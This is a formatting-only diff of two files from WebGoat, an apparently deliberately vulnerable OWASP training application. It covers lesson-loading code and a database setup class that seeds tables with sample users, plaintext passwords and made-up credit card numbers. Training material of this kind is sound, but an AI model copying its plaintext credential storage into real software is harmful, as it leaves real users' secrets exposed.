+			// Strip off the leading path info
+			fileName = fileName.substring(path.length(), fileName.length() - ext.length());
 		}
-	
+
 		return fileName;
-    }
-
-    /**
-     *  Gets the categories attribute of the Course object
-     *
-     * @return    The categories value
-     */
-    public List getCategories()
-    {
-	List<Category> categories = new ArrayList<Category>();
-	Iterator iter = lessons.iterator();
-
-	while (iter.hasNext())
-	{
-	    AbstractLesson lesson = (AbstractLesson) iter.next();
-
-	    if (!categories.contains(lesson.getCategory()))
-	    {
-		categories.add(lesson.getCategory());
-	    }
 	}
 
-	Collections.sort(categories);
-
-	return categories;
-    }
-
-
-    /**
-     *  Gets the firstLesson attribute of the Course object
-     *
-     * @return    The firstLesson value
-     */
-    public AbstractLesson getFirstLesson()
-    {
-	List<String> roles = new ArrayList<String>();
-	roles.add(AbstractLesson.USER_ROLE);
-	// Category 0 is the admin function.  We want the first real category 
-	// to be returned. This is noramally the General category and the Http Basics lesson
-	return ((AbstractLesson) getLessons((Category) getCategories().get(1),
-		roles).get(0));
-    }
-
-
-    /**
-     *  Gets the lesson attribute of the Course object
-     *
-     * @param  lessonId  Description of the Parameter
-     * @param  role      Description of the Parameter
-     * @return           The lesson value
-     */
-    public AbstractLesson getLesson(WebSession s, int lessonId, List<String> roles)
-    {
-	if (s.isHackedAdmin())
+	/**
+	 * Gets the categories attribute of the Course object
+	 * 
+	 * @return The categories value
+	 */
+	public List getCategories()
 	{
-	    roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
-	}
-	//System.out.println("getLesson() with roles: " + roles);
-	Iterator<AbstractLesson> iter = lessons.iterator();
+		List<Category> categories = new ArrayList<Category>();
+		Iterator iter = lessons.iterator();
 
-	while (iter.hasNext())
-	{
-	    AbstractLesson lesson = iter.next();
+		while (iter.hasNext())
+		{
+			AbstractLesson lesson = (AbstractLesson) iter.next();
 
-	    //System.out.println("getLesson() at role: " + lesson.getRole());
-	    if (lesson.getScreenId() == lessonId
-		    && roles.contains(lesson.getRole()))
-	    {
-		return lesson;
-	    }
+			if (!categories.contains(lesson.getCategory()))
+			{
+				categories.add(lesson.getCategory());
+			}
+		}
+
+		Collections.sort(categories);
+
+		return categories;
 	}
 
-	return null;
-    }
-
-
-    public AbstractLesson getLesson(WebSession s, int lessonId, String role)
-    {
-	List<String> roles = new Vector<String>();
-	roles.add(role);
-	return getLesson(s, lessonId, roles);
-    }
-
-
-    public List getLessons(WebSession s, String role)
-    {
-	List<String> roles = new Vector<String>();
-	roles.add(role);
-	return getLessons(s, roles);
-    }
-
-
-    /**
-     *  Gets the lessons attribute of the Course object
-     *
-     * @param  role  Description of the Parameter
-     * @return       The lessons value
-     */
-    public List<AbstractLesson> getLessons(WebSession s, List<String> roles)
-    {
-	if (s.isHackedAdmin())
+	/**
+	 * Gets the firstLesson attribute of the Course object
+	 * 
+	 * @return The firstLesson value
+	 */
+	public AbstractLesson getFirstLesson()
 	{
-	    roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
-	}
-	List<AbstractLesson> lessonList = new ArrayList<AbstractLesson>();
-	Iterator categoryIter = getCategories().iterator();
-
-	while (categoryIter.hasNext())
-	{
-	    lessonList.addAll(getLessons(s, (Category) categoryIter.next(),
-		    roles));
-	}
-	return lessonList;
-    }
-
-
-    /**
-     *  Gets the lessons attribute of the Course object
-     *
-     * @param  category  Description of the Parameter
-     * @param  role      Description of the Parameter
-     * @return           The lessons value
-     */
-    private List<AbstractLesson> getLessons(Category category, List roles)
-    {
-	List<AbstractLesson> lessonList = new ArrayList<AbstractLesson>();
-
-	Iterator iter = lessons.iterator();
-	while (iter.hasNext())
-	{
-	    AbstractLesson lesson = (AbstractLesson) iter.next();
-
-	    if (lesson.getCategory().equals(category)
-		    && roles.contains(lesson.getRole()))
-	    {
-		lessonList.add(lesson);
-	    }
+		List<String> roles = new ArrayList<String>();
+		roles.add(AbstractLesson.USER_ROLE);
+		// Category 0 is the admin function. We want the first real category
+		// to be returned. This is noramally the General category and the Http Basics lesson
+		return ((AbstractLesson) getLessons((Category) getCategories().get(1), roles).get(0));
 	}
 
-	Collections.sort(lessonList);
-	//		System.out.println(java.util.Arrays.asList(lessonList));
-	return lessonList;
-    }
-
-
-    public List getLessons(WebSession s, Category category, String role)
-    {
-	List<String> roles = new Vector<String>();
-	roles.add(role);
-	return getLessons(s, category, roles);
-    }
-
-
-    public List<AbstractLesson> getLessons(WebSession s, Category category, List<String> roles)
-    {
-	if (s.isHackedAdmin())
+	/**
+	 * Gets the lesson attribute of the Course object
+	 * 
+	 * @param lessonId
+	 *            Description of the Parameter
+	 * @param role
+	 *            Description of the Parameter
+	 * @return The lesson value
+	 */
+	public AbstractLesson getLesson(WebSession s, int lessonId, List<String> roles)
 	{
-	    roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
-	}
-	return getLessons(category, roles);
-    }
-    
-    /**
-     * Load all of the filenames into a temporary cache
-     * 
-     * @param context
-     * @param path
-     */
-    private void loadFiles(ServletContext context, String path)
-    {
-    	Set resourcePaths = context.getResourcePaths(path);
-    	Iterator itr = resourcePaths.iterator();
-    	
-    	while(itr.hasNext())
-    	{
-    		String file = (String)itr.next();
-    		
-    		if(file.length() != 1 && file.endsWith("/"))
-    		{
-    			loadFiles(context, file);
-    		}
-    		else
-    		{	
-    			files.add(file);
-    		}
-    	}
-    }
-    
-    /**
-     * Instantiate all the lesson objects into a cache
-     * 
-     * @param path
-     */
-    private void loadLessons(String path)
-    {
-    	Iterator itr = files.iterator();
-    	
-    	while(itr.hasNext())
-    	{
-    		String file = (String)itr.next();
-    		String className = getClassFile(file, path);
-    		
-    		if(className != null && !className.endsWith("_i"))
-    		{
-    			try
-    			{
-    				Class c = Class.forName(className);
-    				Object o = c.newInstance();
-    				
-    				if(o instanceof AbstractLesson)
-    				{
-    					AbstractLesson lesson = (AbstractLesson)o;
-    					lesson.setWebgoatContext(webgoatContext);
-    					
-    					lesson.update(properties);
-    					
-    					if(lesson.getHidden() == false)
-    					{
-    						lessons.add(lesson);
-    					}
-    				}
-    			}
-    			catch (Exception e)
-    			{
-    				//System.out.println("Warning: " + e.getMessage());
-    			}
-    		}
-    	}
-    }
-    
-    /**
-     * For each lesson, set the source file and lesson file
-     */
-    private void loadResources()
-    {
-    	Iterator lessonItr = lessons.iterator();
-    	
-    	while(lessonItr.hasNext())
-    	{
-    		AbstractLesson lesson = (AbstractLesson)lessonItr.next();
-    		String className = lesson.getClass().getName();
-    		String classFile = getSourceFile(className);
-    		
-    		Iterator fileItr = files.iterator();
-    		
-    		while(fileItr.hasNext())
-    		{
-    			String absoluteFile = (String)fileItr.next();
-    			String fileName = getFileName(absoluteFile);
-			//System.out.println("Course: looking at file:  " + absoluteFile);
-    			
-    			if(absoluteFile.endsWith(classFile))
-    			{
-    				//System.out.println("Set source file for " + classFile);
-    				lesson.setSourceFileName(absoluteFile);
-    			}
-    			
-    			if(absoluteFile.startsWith("/lesson_plans") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
-    			{
-    				//System.out.println("DEBUG: setting lesson plan file " + absoluteFile + " for lesson " + lesson.getClass().getName());
-    				//System.out.println("fileName: " + fileName + " == className: " + className );
-    				lesson.setLessonPlanFileName(absoluteFile);
-    			}
-    			if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
-    			{
-    				//System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
-    				//System.out.println("fileName: " + fileName + " == className: " + className );
-    				lesson.setLessonSolutionFileName(absoluteFile);
-    			}
-    		}
-    	}
-    }
+		if (s.isHackedAdmin())
+		{
+			roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
+		}
+		// System.out.println("getLesson() with roles: " + roles);
+		Iterator<AbstractLesson> iter = lessons.iterator();
 
-    /**
-     *  Description of the Method
-     *
-     * @param  path     Description of the Parameter
-     * @param  context  Description of the Parameter
-     */
-    public void loadCourses(WebgoatContext webgoatContext, ServletContext context, String path)
-    {
-    	this.webgoatContext = webgoatContext;
-    	loadFiles(context, path);
-    	loadLessons(path);
-    	loadResources();
-    }
+		while (iter.hasNext())
+		{
+			AbstractLesson lesson = iter.next();
+
+			// System.out.println("getLesson() at role: " + lesson.getRole());
+			if (lesson.getScreenId() == lessonId && roles.contains(lesson.getRole())) { return lesson; }
+		}
+
+		return null;
+	}
+
+	public AbstractLesson getLesson(WebSession s, int lessonId, String role)
+	{
+		List<String> roles = new Vector<String>();
+		roles.add(role);
+		return getLesson(s, lessonId, roles);
+	}
+
+	public List getLessons(WebSession s, String role)
+	{
+		List<String> roles = new Vector<String>();
+		roles.add(role);
+		return getLessons(s, roles);
+	}
+
+	/**
+	 * Gets the lessons attribute of the Course object
+	 * 
+	 * @param role
+	 *            Description of the Parameter
+	 * @return The lessons value
+	 */
+	public List<AbstractLesson> getLessons(WebSession s, List<String> roles)
+	{
+		if (s.isHackedAdmin())
+		{
+			roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
+		}
+		List<AbstractLesson> lessonList = new ArrayList<AbstractLesson>();
+		Iterator categoryIter = getCategories().iterator();
+
+		while (categoryIter.hasNext())
+		{
+			lessonList.addAll(getLessons(s, (Category) categoryIter.next(), roles));
+		}
+		return lessonList;
+	}
+
+	/**
+	 * Gets the lessons attribute of the Course object
+	 * 
+	 * @param category
+	 *            Description of the Parameter
+	 * @param role
+	 *            Description of the Parameter
+	 * @return The lessons value
+	 */
+	private List<AbstractLesson> getLessons(Category category, List roles)
+	{
+		List<AbstractLesson> lessonList = new ArrayList<AbstractLesson>();
+
+		Iterator iter = lessons.iterator();
+		while (iter.hasNext())
+		{
+			AbstractLesson lesson = (AbstractLesson) iter.next();
+
+			if (lesson.getCategory().equals(category) && roles.contains(lesson.getRole()))
+			{
+				lessonList.add(lesson);
+			}
+		}
+
+		Collections.sort(lessonList);
+		// System.out.println(java.util.Arrays.asList(lessonList));
+		return lessonList;
+	}
+
+	public List getLessons(WebSession s, Category category, String role)
+	{
+		List<String> roles = new Vector<String>();
+		roles.add(role);
+		return getLessons(s, category, roles);
+	}
+
+	public List<AbstractLesson> getLessons(WebSession s, Category category, List<String> roles)
+	{
+		if (s.isHackedAdmin())
+		{
+			roles.add(AbstractLesson.HACKED_ADMIN_ROLE);
+		}
+		return getLessons(category, roles);
+	}
+
+	/**
+	 * Load all of the filenames into a temporary cache
+	 * 
+	 * @param context
+	 * @param path
+	 */
+	private void loadFiles(ServletContext context, String path)
+	{
+		Set resourcePaths = context.getResourcePaths(path);
+		Iterator itr = resourcePaths.iterator();
+
+		while (itr.hasNext())
+		{
+			String file = (String) itr.next();
+
+			if (file.length() != 1 && file.endsWith("/"))
+			{
+				loadFiles(context, file);
+			}
+			else
+			{
+				files.add(file);
+			}
+		}
+	}
+
+	/**
+	 * Instantiate all the lesson objects into a cache
+	 * 
+	 * @param path
+	 */
+	private void loadLessons(String path)
+	{
+		Iterator itr = files.iterator();
+
+		while (itr.hasNext())
+		{
+			String file = (String) itr.next();
+			String className = getClassFile(file, path);
+
+			if (className != null && !className.endsWith("_i"))
+			{
+				try
+				{
+					Class c = Class.forName(className);
+					Object o = c.newInstance();
+
+					if (o instanceof AbstractLesson)
+					{
+						AbstractLesson lesson = (AbstractLesson) o;
+						lesson.setWebgoatContext(webgoatContext);
+
+						lesson.update(properties);
+
+						if (lesson.getHidden() == false)
+						{
+							lessons.add(lesson);
+						}
+					}
+				} catch (Exception e)
+				{
+					// System.out.println("Warning: " + e.getMessage());
+				}
+			}
+		}
+	}
+
+	/**
+	 * For each lesson, set the source file and lesson file
+	 */
+	private void loadResources()
+	{
+		Iterator lessonItr = lessons.iterator();
+
+		while (lessonItr.hasNext())
+		{
+			AbstractLesson lesson = (AbstractLesson) lessonItr.next();
+			String className = lesson.getClass().getName();
+			String classFile = getSourceFile(className);
+
+			Iterator fileItr = files.iterator();
+
+			while (fileItr.hasNext())
+			{
+				String absoluteFile = (String) fileItr.next();
+				String fileName = getFileName(absoluteFile);
+				// System.out.println("Course: looking at file: " + absoluteFile);
+
+				if (absoluteFile.endsWith(classFile))
+				{
+					// System.out.println("Set source file for " + classFile);
+					lesson.setSourceFileName(absoluteFile);
+				}
+
+				if (absoluteFile.startsWith("/lesson_plans") && absoluteFile.endsWith(".html")
+						&& className.endsWith(fileName))
+				{
+					// System.out.println("DEBUG: setting lesson plan file " + absoluteFile + " for
+					// lesson " +
+					// lesson.getClass().getName());
+					// System.out.println("fileName: " + fileName + " == className: " + className );
+					lesson.setLessonPlanFileName(absoluteFile);
+				}
+				if (absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html")
+						&& className.endsWith(fileName))
+				{
+					// System.out.println("DEBUG: setting lesson solution file " + absoluteFile + "
+					// for lesson " +
+					// lesson.getClass().getName());
+					// System.out.println("fileName: " + fileName + " == className: " + className );
+					lesson.setLessonSolutionFileName(absoluteFile);
+				}
+			}
+		}
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param path
+	 *            Description of the Parameter
+	 * @param context
+	 *            Description of the Parameter
+	 */
+	public void loadCourses(WebgoatContext webgoatContext, ServletContext context, String path)
+	{
+		this.webgoatContext = webgoatContext;
+		loadFiles(context, path);
+		loadLessons(path);
+		loadResources();
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java b/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java
index c5da993f9..b46f6c398 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java
@@ -1,788 +1,751 @@
+
 package org.owasp.webgoat.session;
 
 import java.sql.Connection;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.owasp.webgoat.lessons.AbstractLesson;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
  */
 public class CreateDB
 {
 
-    /**
-     * Description of the Method
-     *
-     * @param connection Description of the Parameter
-     *
-     * @exception SQLException Description of the Exception
-     */
-    private void createMessageTable(Connection connection) throws SQLException
-    {
-	Statement statement = connection.createStatement();
+	/**
+	 * Description of the Method
+	 * 
+	 * @param connection
+	 *            Description of the Parameter
+	 * 
+	 * @exception SQLException
+	 *                Description of the Exception
+	 */
+	private void createMessageTable(Connection connection) throws SQLException
+	{
+		Statement statement = connection.createStatement();
 
-	// Drop admin user table
-	try
-	{
-	    String dropTable = "DROP TABLE messages";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error dropping message database");
+		// Drop admin user table
+		try
+		{
+			String dropTable = "DROP TABLE messages";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error dropping message database");
+		}
+
+		// Create the new table
+		try
+		{
+			String createTableStatement = "CREATE TABLE messages (" + "num int not null," + "title varchar(50),"
+					+ "message varchar(200)," + "user_name varchar(50) not null " + ")";
+			statement.executeUpdate(createTableStatement);
+		} catch (SQLException e)
+		{
+			System.out.println("Error creating message database");
+			e.printStackTrace();
+		}
 	}
 
-	// Create the new table
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param connection
+	 *            Description of the Parameter
+	 * 
+	 * @exception SQLException
+	 *                Description of the Exception
+	 */
+	private void createProductTable(Connection connection) throws SQLException
 	{
-	    String createTableStatement = "CREATE TABLE messages ("
-		    + "num int not null," + "title varchar(50),"
-		    + "message varchar(200),"
-		    + "user_name varchar(50) not null " + ")";
-	    statement.executeUpdate(createTableStatement);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error creating message database");
-	    e.printStackTrace();
-	}
-    }
+		Statement statement = connection.createStatement();
 
+		// Drop admin user table
+		try
+		{
+			String dropTable = "DROP TABLE product_system_data";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error dropping product database");
+		}
 
-    /**
-     * Description of the Method
-     *
-     * @param connection Description of the Parameter
-     *
-     * @exception SQLException Description of the Exception
-     */
-    private void createProductTable(Connection connection) throws SQLException
-    {
-	Statement statement = connection.createStatement();
+		// Create the new table
+		try
+		{
+			String createTableStatement = "CREATE TABLE product_system_data ("
+					+ "productid varchar(6) not null primary key," + "product_name varchar(20)," + "price varchar(10)"
+					+ ")";
+			statement.executeUpdate(createTableStatement);
+		} catch (SQLException e)
+		{
+			System.out.println("Error creating product database");
+			e.printStackTrace();
+		}
 
-	// Drop admin user table
-	try
-	{
-	    String dropTable = "DROP TABLE product_system_data";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error dropping product database");
+		// Populate
+		String insertData1 = "INSERT INTO product_system_data VALUES ('32226','Dog Bone','$1.99')";
+		String insertData2 = "INSERT INTO product_system_data VALUES ('35632','DVD Player','$214.99')";
+		String insertData3 = "INSERT INTO product_system_data VALUES ('24569','60 GB Hard Drive','$149.99')";
+		String insertData4 = "INSERT INTO product_system_data VALUES ('56970','80 GB Hard Drive','$179.99')";
+		String insertData5 = "INSERT INTO product_system_data VALUES ('14365','56 inch HDTV','$6999.99')";
+		statement.executeUpdate(insertData1);
+		statement.executeUpdate(insertData2);
+		statement.executeUpdate(insertData3);
+		statement.executeUpdate(insertData4);
+		statement.executeUpdate(insertData5);
 	}
 
-	// Create the new table
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param connection
+	 *            Description of the Parameter
+	 * 
+	 * @exception SQLException
+	 *                Description of the Exception
+	 */
+	private void createUserAdminTable(Connection connection) throws SQLException
 	{
-	    String createTableStatement = "CREATE TABLE product_system_data ("
-		    + "productid varchar(6) not null primary key,"
-		    + "product_name varchar(20)," + "price varchar(10)" + ")";
-	    statement.executeUpdate(createTableStatement);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error creating product database");
-	    e.printStackTrace();
+		Statement statement = connection.createStatement();
+
+		// Drop admin user table
+		try
+		{
+			String dropTable = "DROP TABLE user_system_data";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error dropping user admin database");
+		}
+
+		// Create the new table
+		try
+		{
+			String createTableStatement = "CREATE TABLE user_system_data (" + "userid varchar(5) not null primary key,"
+					+ "user_name varchar(12)," + "password varchar(10)," + "cookie varchar(30)" + ")";
+			statement.executeUpdate(createTableStatement);
+		} catch (SQLException e)
+		{
+			System.out.println("Error creating user admin database");
+			e.printStackTrace();
+		}
+
+		// Populate
+		String insertData1 = "INSERT INTO user_system_data VALUES ('101','jsnow','passwd1', '')";
+		String insertData2 = "INSERT INTO user_system_data VALUES ('102','jdoe','passwd2', '')";
+		String insertData3 = "INSERT INTO user_system_data VALUES ('103','jplane','passwd3', '')";
+		String insertData4 = "INSERT INTO user_system_data VALUES ('104','jeff','jeff', '')";
+		String insertData5 = "INSERT INTO user_system_data VALUES ('105','dave','dave', '')";
+		statement.executeUpdate(insertData1);
+		statement.executeUpdate(insertData2);
+		statement.executeUpdate(insertData3);
+		statement.executeUpdate(insertData4);
+		statement.executeUpdate(insertData5);
 	}
 
-	// Populate
-	String insertData1 = "INSERT INTO product_system_data VALUES ('32226','Dog Bone','$1.99')";
-	String insertData2 = "INSERT INTO product_system_data VALUES ('35632','DVD Player','$214.99')";
-	String insertData3 = "INSERT INTO product_system_data VALUES ('24569','60 GB Hard Drive','$149.99')";
-	String insertData4 = "INSERT INTO product_system_data VALUES ('56970','80 GB Hard Drive','$179.99')";
-	String insertData5 = "INSERT INTO product_system_data VALUES ('14365','56 inch HDTV','$6999.99')";
-	statement.executeUpdate(insertData1);
-	statement.executeUpdate(insertData2);
-	statement.executeUpdate(insertData3);
-	statement.executeUpdate(insertData4);
-	statement.executeUpdate(insertData5);
-    }
-
-
-    /**
-     * Description of the Method
-     *
-     * @param connection Description of the Parameter
-     *
-     * @exception SQLException Description of the Exception
-     */
-    private void createUserAdminTable(Connection connection)
-	    throws SQLException
-    {
-	Statement statement = connection.createStatement();
-
-	// Drop admin user table
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param connection
+	 *            Description of the Parameter
+	 * 
+	 * @exception SQLException
+	 *                Description of the Exception
+	 */
+	private void createUserDataTable(Connection connection) throws SQLException
 	{
-	    String dropTable = "DROP TABLE user_system_data";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error dropping user admin database");
+		Statement statement = connection.createStatement();
+
+		// Delete table if there is one
+		try
+		{
+			String dropTable = "DROP TABLE user_data";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error dropping user database");
+		}
+
+		// Create the new table
+		try
+		{
+			String createTableStatement = "CREATE TABLE user_data (" + "userid int not null,"
+					+ "first_name varchar(20)," + "last_name varchar(20)," + "cc_number varchar(30),"
+					+ "cc_type varchar(10)," + "cookie varchar(20)," + "login_count int" + ")";
+			statement.executeUpdate(createTableStatement);
+		} catch (SQLException e)
+		{
+			System.out.println("Error creating user database");
+			e.printStackTrace();
+		}
+
+		// Populate it
+		String insertData1 = "INSERT INTO user_data VALUES (101,'Joe','Snow','987654321','VISA',' ',0)";
+		String insertData2 = "INSERT INTO user_data VALUES (101,'Joe','Snow','2234200065411','MC',' ',0)";
+		String insertData3 = "INSERT INTO user_data VALUES (102,'John','Smith','2435600002222','MC',' ',0)";
+		String insertData4 = "INSERT INTO user_data VALUES (102,'John','Smith','4352209902222','AMEX',' ',0)";
+		String insertData5 = "INSERT INTO user_data VALUES (103,'Jane','Plane','123456789','MC',' ',0)";
+		String insertData6 = "INSERT INTO user_data VALUES (103,'Jane','Plane','333498703333','AMEX',' ',0)";
+		String insertData7 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','176896789','MC',' ',0)";
+		String insertData8 = "INSERT INTO user_data VALUES (10312,'Jolly','Hershey','333300003333','AMEX',' ',0)";
+		String insertData9 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','673834489','MC',' ',0)";
+		String insertData10 = "INSERT INTO user_data VALUES (10323,'Grumpy','White','33413003333','AMEX',' ',0)";
+		String insertData11 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','123609789','MC',' ',0)";
+		String insertData12 = "INSERT INTO user_data VALUES (15603,'Peter','Sand','338893453333','AMEX',' ',0)";
+		String insertData13 = "INSERT INTO user_data VALUES (15613,'Joesph','Something','33843453533','AMEX',' ',0)";
+		statement.executeUpdate(insertData1);
+		statement.executeUpdate(insertData2);
+		statement.executeUpdate(insertData3);
+		statement.executeUpdate(insertData4);
+		statement.executeUpdate(insertData5);
+		statement.executeUpdate(insertData6);
+		statement.executeUpdate(insertData7);
+		statement.executeUpdate(insertData8);
+		statement.executeUpdate(insertData9);
+		statement.executeUpdate(insertData10);
+		statement.executeUpdate(insertData11);
+		statement.executeUpdate(insertData12);
+		statement.executeUpdate(insertData13);
 	}
 
-	// Create the new table
-	try
+	private void createLoginTable(Connection connection) throws SQLException
 	{
-	    String createTableStatement = "CREATE TABLE user_system_data ("
-		    + "userid varchar(5) not null primary key,"
-		    + "user_name varchar(12)," + "password varchar(10),"
-		    + "cookie varchar(30)" + ")";
-	    statement.executeUpdate(createTableStatement);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error creating user admin database");
-	    e.printStackTrace();
+		Statement statement = connection.createStatement();
+
+		// Delete table if there is one
+		try
+		{
+			String dropTable = "DROP TABLE user_login";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error dropping user_login table");
+		}
+
+		// Create the new table
+		try
+		{
+			String createTableStatement = "CREATE TABLE user_login (" + "userid varchar(5),"
+					+ "webgoat_user varchar(20)" + ")";
+			statement.executeUpdate(createTableStatement);
+		} catch (SQLException e)
+		{
+			System.out.println("Error creating user database");
+			e.printStackTrace();
+		}
+
 	}
 
-	// Populate
-	String insertData1 = "INSERT INTO user_system_data VALUES ('101','jsnow','passwd1', '')";
-	String insertData2 = "INSERT INTO user_system_data VALUES ('102','jdoe','passwd2', '')";
-	String insertData3 = "INSERT INTO user_system_data VALUES ('103','jplane','passwd3', '')";
-	String insertData4 = "INSERT INTO user_system_data VALUES ('104','jeff','jeff', '')";
-	String insertData5 = "INSERT INTO user_system_data VALUES ('105','dave','dave', '')";
-	statement.executeUpdate(insertData1);
-	statement.executeUpdate(insertData2);
-	statement.executeUpdate(insertData3);
-	statement.executeUpdate(insertData4);
-	statement.executeUpdate(insertData5);
-    }
-
-
-    /**
-     * Description of the Method
-     *
-     * @param connection Description of the Parameter
-     *
-     * @exception SQLException Description of the Exception
-     */
-    private void createUserDataTable(Connection connection) throws SQLException
-    {
-	Statement statement = connection.createStatement();
-
-	// Delete table if there is one
-	try
+	/**
+	 * Description of the Method
+	 * 
+	 * @param connection
+	 *            Description of the Parameter
+	 * 
+	 * @exception SQLException
+	 *                Description of the Exception
+	 */
+	private void createWeatherDataTable(Connection connection) throws SQLException
 	{
-	    String dropTable = "DROP TABLE user_data";
-	    statement.executeUpdate(dropTable);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error dropping user database");
+		Statement statement = connection.createStatement();
+
+		// Delete table if there is one
+		try
+		{
+			String dropTable = "DROP TABLE weather_data";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error dropping weather database");
+		}
+
+		// Create the new table
+		try
+		{
+			String createTableStatement = "CREATE TABLE weather_data (" + "station int not null,"
+					+ "name varchar(20) not null," + "state char(2) not null," + "min_temp int not null,"
+					+ "max_temp int not null" + ")";
+			statement.executeUpdate(createTableStatement);
+		} catch (SQLException e)
+		{
+			System.out.println("Error creating weather database");
+			e.printStackTrace();
+		}
+
+		// Populate it
+		String insertData1 = "INSERT INTO weather_data VALUES (101,'Columbia','MD',-10,102)";
+		String insertData2 = "INSERT INTO weather_data VALUES (102,'Seattle','WA',-15,90)";
+		String insertData3 = "INSERT INTO weather_data VALUES (103,'New York','NY',-10,110)";
+		String insertData4 = "INSERT INTO weather_data VALUES (104,'Houston','TX',20,120)";
+		String insertData5 = "INSERT INTO weather_data VALUES (10001,'Camp David','MD',-10,100)";
+		String insertData6 = "INSERT INTO weather_data VALUES (11001,'Ice Station Zebra','NA',-60,30)";
+		statement.executeUpdate(insertData1);
+		statement.executeUpdate(insertData2);
+		statement.executeUpdate(insertData3);
+		statement.executeUpdate(insertData4);
+		statement.executeUpdate(insertData5);
+		statement.executeUpdate(insertData6);
 	}
 
-	// Create the new table
-	try
+	// --------------------------------------------------------------------------
+	// --------------------------------------------------------------------------
+	//
+	// The tables below are for WebGoat Financials
+	//
+	// DO NOT MODIFY THESE TABLES - unless you change the org chart
+	// and access control matrix documents
+	//
+	// --------------------------------------------------------------------------
+	// --------------------------------------------------------------------------
+
+	private void createEmployeeTable(Connection connection) throws SQLException
 	{
-	    String createTableStatement = "CREATE TABLE user_data ("
-		    + "userid int not null," + "first_name varchar(20),"
-		    + "last_name varchar(20)," + "cc_number varchar(30),"
-		    + "cc_type varchar(10)," + "cookie varchar(20),"
-		    + "login_count int" + ")";
-	    statement.executeUpdate(createTableStatement);
-	}
-	catch (SQLException e)
-	{
-	    System.out.println("Error creating user database");
-	    e.printStackTrace();
+		Statement statement = connection.createStatement();
+
+		try
+		{
+			String dropTable = "DROP TABLE employee";
+			statement.executeUpdate(dropTable);
+		} catch (SQLException e)
+		{
+			System.out.println("Error: unable to drop employee table");
+		}
+
+		// Create Table
+		try
+		{
+			String createTable = "CREATE TABLE employee ("
+					// + "userid INT GENERATED ALWAYS AS IDENTITY PRIMARY KEY,"
+					+ "userid INT NOT NULL PRIMARY KEY," + "first_name VARCHAR(20)," + "last_name VARCHAR(20),"
+					+ "ssn VARCHAR(12)," + "password VARCHAR(10)," + "title VARCHAR(20)," + "phone VARCHAR(13),"
+					+ "address1 VARCHAR(80)," + "address2 VARCHAR(80)," + "manager INT," + "start_date CHAR(8),"
+					+ "salary INT," + "ccn VARCHAR(30)," + "ccn_limit INT," + "email VARCHAR(30)," // reason
+																									// for
+																									// the
+					// recent write-up
+					+ "disciplined_date CHAR(8)," // date of write up, NA otherwise
+					+ "disciplined_notes VARCHAR(60)," // reason for the recent write-up
